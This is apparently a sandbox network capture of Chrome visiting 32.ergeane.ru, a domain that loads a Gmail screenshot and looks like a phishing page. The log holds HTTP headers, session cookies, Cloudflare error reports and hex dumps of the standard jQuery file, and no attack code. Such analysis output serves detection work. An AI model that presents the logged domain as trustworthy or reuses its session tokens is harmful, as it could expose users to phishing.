                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://32.ergeane.ru/yNriUGk0/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  Cookie: XSRF-TOKEN=eyJpdiI6IlBSMUtzOTd4YWc3MHFGeG5HTlR2SVE9PSIsInZhbHVlIjoiOVpNUFJhRkh0c2R2WDFvR2RnM3JIdEM5Z3BhY3ExYjB1eGtQSTFkZHZGNzZXM1h3NVY5SWFFSUxtY3Vlc1M2OUpzZGY1L3hPdzhmOWVBaFJhVWtBdXBkYzY4ZkdTM0pkMU9RR3dFY2FvZFI5ZWJSZjcreUo5Wld4ZkluTlF3dDYiLCJtYWMiOiI1NjFkM2M1NzA5YWI4ZmRlNDAyODE3ZDZkYzhhYzI0OTMzZTRhMjMzOTE1NmJkZGVhNDgwYzExYzIxYTBkZDZmIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6ImxQSFNRczFxZnUxOVRCMEFnaTAzeXc9PSIsInZhbHVlIjoiSlNIWEVOMUl5L29FMGU3STVSdzlQN2FBK1E0NWY0c3Q2dVcvMzFvbnZwTG1laiszS05TVnRybzBNNStSM2JuVndXRTYwSm0wSWdSZVhJTFp1Slk5ejh1aDROZTVSNDJyUnlpckswNWFuWnFZNllhandnOGt1QURzZW9MQys3Y0UiLCJtYWMiOiIyMjU2YTMyMWRkZTNhZDIzZTEyMTRjOWEzNmNiNjhhMWQ0ODM5Y2Q4NTBhMWFlZTUwNDQ5NDM2ZDMwMjEzMDIyIiwidGFnIjoiIn0%3D
                                                                                                                                                                                                                                  2024-12-18 19:28:17 UTC1083INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:17 GMT
                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Cache-Control: max-age=14400
                                                                                                                                                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r6A0V5eJHrcabc1RHlQm3W1GJ8RrJJlBC6i0oCJwyMEtdVqAHIVSL%2FSxVwAovMVg95dSgMqzWiz%2FnFP%2FfxqizR%2FDTfMeqN%2FG0geMLltpd6Yh77BM%2Bce3TJh%2Fqj%2FYRA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1337&min_rtt=1201&rtt_var=92&sent=1129&recv=320&lost=0&retrans=0&sent_bytes=1327579&recv_bytes=50371&delivery_rate=53683791&cwnd=335&unsent_bytes=0&cid=901b9ac1cfb4cdef&ts=602373&x=0"
                                                                                                                                                                                                                                  CF-Cache-Status: EXPIRED
                                                                                                                                                                                                                                  Server: cloudflare
                                                                                                                                                                                                                                  CF-RAY: 8f418e19b9b9efa3-EWR
                                                                                                                                                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2108&min_rtt=2100&rtt_var=805&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2821&recv_bytes=1892&delivery_rate=1345002&cwnd=114&unsent_bytes=0&cid=b2eb2b4ca8b49466&ts=4634&x=0"
                                                                                                                                                                                                                                  2024-12-18 19:28:17 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                  Data Ascii: 0


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  24192.168.2.1649736151.101.130.1374436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC358OUTGET /jquery-3.6.0.min.js HTTP/1.1
                                                                                                                                                                                                                                  Host: code.jquery.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                  Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC611INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  Content-Length: 89501
                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                  Content-Type: application/javascript; charset=utf-8
                                                                                                                                                                                                                                  Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                                                                                                                                                                                  ETag: "28feccc0-15d9d"
                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                                                                                                                                                                                  Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                  Cross-Origin-Resource-Policy: cross-origin
                                                                                                                                                                                                                                  Via: 1.1 varnish, 1.1 varnish
                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                  Age: 3071631
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:18 GMT
                                                                                                                                                                                                                                  X-Served-By: cache-lga21931-LGA, cache-nyc-kteb1890078-NYC
                                                                                                                                                                                                                                  X-Cache: HIT, HIT
                                                                                                                                                                                                                                  X-Cache-Hits: 55, 0
                                                                                                                                                                                                                                  X-Timer: S1734550098.451964,VS0,VE1
                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                                                                                                                                                                                  Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 53 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                                                                                                                                                                                  Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=S.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return S.each(this,e)},map:function(n){return this.pushStack(S.map(this,f
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 76 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                                                                                                                                                                                  Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=v.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                                                                                                                                                                                  Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                                                                                                                                                                                  Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 79 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 53 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 72 65 74 75 72 6e 20 48 2e 61 70 70 6c 79 28 6e 2c 66 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 63 29 29 2c 6e 7d 63 61 74 63 68 28
                                                                                                                                                                                                                                  Data Ascii: )){(f=ee.test(t)&&ye(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=S)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{return H.apply(n,f.querySelectorAll(c)),n}catch(
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e 73 75 70 70 6f 72 74 3d 7b 7d 2c 69 3d 73 65 2e 69 73 58 4d 4c 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 26 26 65 2e 6e 61 6d 65 73 70 61 63 65 55 52 49 2c 6e 3d 65 26 26 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c
                                                                                                                                                                                                                                  Data Ascii: ion(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ye(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.support={},i=se.isXML=function(e){var t=e&&e.namespaceURI,n=e&&(e.ownerDocument|
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                                                                                                                                                                                  Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                                                                                                                                                                                  Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                                                                                                                                                                                  Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  25192.168.2.164973835.190.80.14436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:18 UTC542OUTOPTIONS /report/v4?s=r6A0V5eJHrcabc1RHlQm3W1GJ8RrJJlBC6i0oCJwyMEtdVqAHIVSL%2FSxVwAovMVg95dSgMqzWiz%2FnFP%2FfxqizR%2FDTfMeqN%2FG0geMLltpd6Yh77BM%2Bce3TJh%2Fqj%2FYRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Origin: https://32.ergeane.ru
                                                                                                                                                                                                                                  Access-Control-Request-Method: POST
                                                                                                                                                                                                                                  Access-Control-Request-Headers: content-type
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:19 UTC336INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  access-control-max-age: 86400
                                                                                                                                                                                                                                  access-control-allow-methods: OPTIONS, POST
                                                                                                                                                                                                                                  access-control-allow-origin: *
                                                                                                                                                                                                                                  access-control-allow-headers: content-type, content-length
                                                                                                                                                                                                                                  date: Wed, 18 Dec 2024 19:28:18 GMT
                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  26192.168.2.164973935.190.80.14436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:20 UTC486OUTPOST /report/v4?s=r6A0V5eJHrcabc1RHlQm3W1GJ8RrJJlBC6i0oCJwyMEtdVqAHIVSL%2FSxVwAovMVg95dSgMqzWiz%2FnFP%2FfxqizR%2FDTfMeqN%2FG0geMLltpd6Yh77BM%2Bce3TJh%2Fqj%2FYRA%3D%3D HTTP/1.1
                                                                                                                                                                                                                                  Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  Content-Length: 425
                                                                                                                                                                                                                                  Content-Type: application/reports+json
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:20 UTC425OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 35 30 32 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 68 74 74 70 73 3a 2f 2f 33 32 2e 65 72 67 65 61 6e 65 2e 72 75 2f 79 4e 72 69 55 47 6b 30 2f 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 31 2e 33 32 2e 32 32 35 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 34 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c
                                                                                                                                                                                                                                  Data Ascii: [{"age":0,"body":{"elapsed_time":502,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"https://32.ergeane.ru/yNriUGk0/","sampling_fraction":1.0,"server_ip":"104.21.32.225","status_code":404,"type":"http.error"},"type":"network-error",
                                                                                                                                                                                                                                  2024-12-18 19:28:20 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Content-Length: 0
                                                                                                                                                                                                                                  date: Wed, 18 Dec 2024 19:28:20 GMT
                                                                                                                                                                                                                                  Via: 1.1 google
                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                  Connection: close


                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                  27192.168.2.1649740104.18.161.1174436196C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC669OUTGET /5f15081919fdf673994ab5fd/656e7a8eaa7a23c65aeb7444_Gmail-In-App-Screenshot-(1080p).webp HTTP/1.1
                                                                                                                                                                                                                                  Host: cdn.prod.website-files.com
                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                  sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                  sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                  sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                  Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                  Sec-Fetch-Dest: image
                                                                                                                                                                                                                                  Referer: https://32.ergeane.ru/
                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                  2024-12-18 19:28:24 UTC957INHTTP/1.1 200 OK
                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 19:28:24 GMT
                                                                                                                                                                                                                                  Content-Type: image/webp
                                                                                                                                                                                                                                  Content-Length: 106290
                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                  x-amz-id-2: ykOAIFjBYjIASAiCYVBMeSrMGA6UWk+uKxpq3MpyXwVNqfU1hBcYHQ7hMWTfiN4oaVDzl9stS/sm+R7QzApeYnSnR+sJXig5QtARV1Cx+9Y=
